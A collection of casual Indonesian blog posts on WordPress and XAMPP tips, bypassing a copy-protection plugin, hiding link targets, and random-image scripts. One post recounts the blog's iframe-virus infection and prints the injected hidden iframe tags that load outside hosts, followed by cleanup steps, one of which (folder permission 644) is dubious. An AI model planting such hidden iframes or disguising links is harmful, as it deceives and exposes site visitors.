Ditulisan ini sedikitpun aku ngak ada maksud mengajarkan hal yang ngak bener. Hanya untuk sharing berbagi apa yang bisa aku bagi *apa ini maksudnya*

Sebagai studi kasus, kita akan bermain – main di rumah kang Penyo.Web.Id beliau adalah salah satu blogger yang aku seganin. Kebetulan dia juga menggunakan plugin WP-CopyProtect. Secara garis besar WP-CopyProtect mengurangi atau memantau aktifitas mouse. Misalkan tidak dapat memblok atau melakukan klik kanan.

Untuk kasus pertama tidak dapat memblok tulisan pada halaman blog. Kelemahan dari sistem keamanan ini adalah pada script yang digunakan. Plugin ini menggunakan JS aka JavaScript untuk melakukan aksinya. Untuk sekedar informasi saja, untuk JavaScript sebagian besar bekerja setelah loading halaman selesai, nah bagaimana jika proses loading belum selesai prosesnya kita hentikan? hasilnya JavaScript yang berfungsi untuk menjadi pengaman Tidak bekerja sebagaimana mestinya. Maka yang terjadi bisa anda lihat dibawah ini.

Tulisan Tetap bisa di Blok

Selanjutnya pada kasus klik kanan di disabled atau tidak diizinkan, biasanya ini hanya untuk melihat sourcecode yang digunakan. Biasanya jika kita melakukan aksi klik kanan maka akan muncul pesan seperti ini

Alert Pesan

Untuk mengakalinya bisa juga menggunakan cara sebelumnya, atau yang lebih simple lagi lkita bisa gunakan fasilitas dari browser. cukup memilih menu View >> Page Source

maka semua jampi – jampi yang ada diblog untuk pertahanan akan bisa diatasi. Semoga trik nan simple ini tidak disalah gunakan.

Standart

Mouse Over

Sempat menghilangkan sejenak list top komentator di sidebar dengan alasan belum mendapat ide akan dibuat seperti apa. harapannya sih semua yang ada diblog ini selalu berbeda dari yang lainnya. kapan – kapan mau ta’ buat jadi plugin, jadi ngak perlu repot – repot buka koding themes. Buat rekans yang mejeng ditop list top komentatorku ta’ ucapin banyak – banyak terimakasih, Buat yang pingin mejeng silahkeun berkomen ria diblog jablai ini. Tapi inget jangan nyepam loh

Kembali kepokok bahasan, Sering kali kalau kita membuka phpMyAdmin pada browser dengan alamat “http://localhost/phpmyadmin“. Nah seharusnya phpmyadmin ini berada pada folder htdocs. Namun untuk xampp yang sudah satu paket komplit biasanya folder phpMyAdmin berada diluar htdocs.

Nah jika punya project atau kerjaan yang tidak mau dicampur dalam satu folder htdocs kita bisa mengakalinya dengan menambahkan alias pada file “xampp/apache/conf/extra/httpd-xampp.conf” belum sempat mengecek tiap versi apakah sama atau tidak. Selanjutnya cari pada bagian

Alias /phpmyadmin “/xampp/phpMyAdmin/”

<Directory “/xampp/phpMyAdmin”>

AllowOverride AuthConfig

Order allow,deny

Allow from all

</Directory>

Letakkan beberapa baris konfigurasi setelah baris diatas

Alias /test “/xampp/test/”
<Directory “/xampp/test”>
Order Allow,deny
Allow from all
</Directory>

jangan lupa di buat folder “test” diluar folder “htdocs” setelah selesai jangan lupa restart apachenya. Jika sudah berjalan kembali silahkan coba di browser masukkan url “http://localhost/test” silahkan lihat sendiri hasilnya .

Untuk tiap versi mungkin hanya butuh sedikit penyusuaian, untuk apache dilinux mungkin kapan – kapan bisa dicobain*klo inget ya* Semoga bermanfaat. Jika ada kesalahan mohon direvisi.

Buku Tamu

Buat yang doyan ninggalin jejak dishotmix silahkan menuju tekape. Pergunakanlah fasilitas yang ada diblog ini yang dikasi free dengan sebijak – bijaknya (sok dewasa dikit). Saran terakhir dari empunya blog, kalau mau mencoba fasilitas ini pastikan dahulu loading blog ini selesai. selamat berkoar – koar

facebox

Fasilitas yang ditawarkan

• Membuka Gambar
  
• Menampilkan info / alert  disimpan kedalam layar yang disembunyikan
• Memanggil dari file lain

Yang penasaran bisa download paketnya disini, yang pingin liat demo programya bisa klik disini, semoga bermanfaat buat rekan yang doyan buat aplikasi yang web yang interaktif.

Cara mengetahuinya silahkan letakkan mouse pad kedua link tadi lalu perhatikan status bar browser kita. Silahkan Liat image / picture / gambar

dan

Lumayan kan buat ngakalin benner atau link refferal. Yang penasaran silahkan kopikan code dibawah ini

1
2

<a href="http://herukurniawan.com" target="_blank">link pertama</a> 
<a style="cursor:pointer" onclick="location.href='http://herukurniawan.com'" >link kedua</a>

Belum sempat dicek disemua browser yang jelas firefox berjalan dengan sempurna. Selamat mencoba

Nama pluginnya exec-PHP Mungkin buat yang udah tau ini bukan hal yang aneh lagi.  Akunya aja yang katrok baru tau kalau ada plugin keren ini. Hal Yang terpenting adalah kita harus memiliki dasar bahasa pemrograman PHP. Selain itu yang perlu diperhatikan dalam menyisipkan script PHP posisi editor text kita harus dalam mode HTML

Namun sayangnya kita tidak dapat menggunakan class – class yang sudah tersedia dari wordpress, ini karna untuk menjaga keamanan blog agar tidak bisa diobrak – abrik orang lain, kebayangkan kalau satu blog yang dipake rame – rame alias kroyokan ada yang nyisipin script php dipostingannya buat obrak abrik database si blog, silahkan rekans bayangkan sendiri hasilnya gmana. ini mungkin jadi kelemahan yang dijadikan kelebihan plugin ini.

Untuk manualnya cara penggunaannya dapat langsung menuju official sitenya. Untuk yang berminat source code pada postingan 20 Top Komentator 2009 tunggu aja ntar aku akan kasi scriptnya. Semoga bermanfaat bagi yang membutuhkan. hepi koding

Ceritanya begini, Beberapa hari yang lalu blog katrok ini diinggapi virus iframe, aku juga baru menyadari setelah melihat kecepatan load blog ini. Merasa aneh ngak biasanya load blog ini lumayan lama. Sempat berpikir mungkin netnya emang lagi katrok atau servernya lagi kurang sehat. Ternyata setelah nurunin scroll lebih jauh mulai kelihatan penampakan si virus, mungkin yang sempat ngeliat ada iframe dibawah footer blog ini seperti gambar dibawah ini. Murni ini bukan kerjaan iseng aku, tapi kerjaannya si virus iframe.

Penampakan Virus Iframe

Efeknya? Untuk jangka panjang yang mungkin ditimbulkan dari si virus, web/blog yang terinveksi akan dicap sebagai web yang berbahaya. Kalau untuk web/blog untuk mencari rejeki bisa kacau tuh, tapi kalo untuk blog personal kacau juga sih (hehehe).

Bagaimana bisa masuk kehosting kita? Ini masih mungkin ya, berdasar pengalaman yang aku alamin, salah satu penyebabnya adalah dari komputer tempat kita mengupload file-file ke server dengan menggunakan FTP Client. Nah, di OS yang kita pake ngupload itu sudah terinstall worm yang bertugas mencuri konfigurasi FTP yang kita gunakan antara lain alamat host, user name dan password.

contoh kode yang disisipkan si virus ke file index

<iframe src=”http://internetcountercheck.com/?click=12433700? width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

<iframe src=”http://xtrarobotz.com/?click=98E581? width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

<iframe src=”http://peskostruikaz.com/?click=198EA8? width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

Cara Penanganan?

• Ubah Password FTP yang digunakan
• Ubah Permisson Folder menjadi 644
• Cek kembali file – file index yang sudah dibersihkan
• Silahkan kalau ada yang mau nambahin………

Semoga bermanfaat buat yang ngalamin kasus serupa. jika ada yang ngeliat virus itu beraksi lagi diblog ini harap melapor kemarkas

Langsung aja kita ubah koding sebelumnya yang menggunakan bahasa pemrograman PHP menjadi JavaScript

PHP

1
2
3
4

<?php
$angka = rand(1,2);
echo "<img src='".$angka.".jpg'>";
?>

JavaScript

1
2
3
4
5

<script language="JavaScript">
  var ry=Math.floor(Math.random()*3)
	ry = ry+1;
   document.write("<img src='"+ry+".jpg'>")
</script>

Selesai sudah utangku. Yang mau nyobain bisa download filenya disini. Semoga bermanfaat buat yang membutuhkan, buat mase mungil terima kasih udah memberikan aku inspirasi buat posting tulisan baru

heppy coding

Silahkan kopikan potongan kode dibawah. simpan kedalam sebuah file dan jangan lupa beri ekstensi .php

1
2
3
4

<?php
$angka = rand(1,2);
echo "<img src='".$angka.".jpg'>";
?>

Selanjutnya siapkanlah dua atau tiga photo lalu kopikan kedalam satu folder dengan file yang berisi kode diatas. Selanjutnya Rename/ubah nama file photo tersebut menjadi angka yang berurut misal untitled.jpg menjadi 1.jpg. jika lebih dari satu photo maka rename/ubah sesuai angka yang berurut.

penjelasan program

$angka = $rand(1,2);

angka dua disesuaikan dengan jumlah photo atau image yang akan ditampilkan. untuk mecobanya silahkan download file berikut, semoga source code simple diatas dapat bermanfaat .